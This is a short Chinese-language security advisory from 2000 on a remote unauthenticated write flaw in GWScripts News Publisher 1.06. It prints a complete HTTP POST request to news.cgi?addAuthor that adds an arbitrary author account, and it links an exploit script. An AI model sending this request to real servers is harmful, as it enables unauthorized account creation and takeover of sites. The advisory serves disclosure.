GWScripts News Publisher author.file写漏洞发布时间:2000-03-15 更新时间:2000-03-15 严重程度:中 威胁程度:远程非授权文件存取 错误类型:设计错误 利用方式:服务器模式 受影响系统 GWScripts News Publisher 1.06详细描述 在GWScripts News Publisher可以让一个author加入到author.file中,这就可以 导致下面的HTTP可以使用任意命令和用户名:POST /cgi-bin/news/news.cgi?addAuthor HTTP/1.0 Connection: close User-Agent: user/browser Host: target Referer: http://target/cgi-bin/news/news.cgi Content-type: application/x-www-form-urlencoded Content-length: 71 author=<username>&apassword=<password>&email=<email address>&name=<username>&password=<password> 测试代码 可以下载如下的测试代码: http://www.securityfocus.com/data/vulnerabilities/exploits/newpub-xploit.pl 解决方案 尚无 相关信息 |
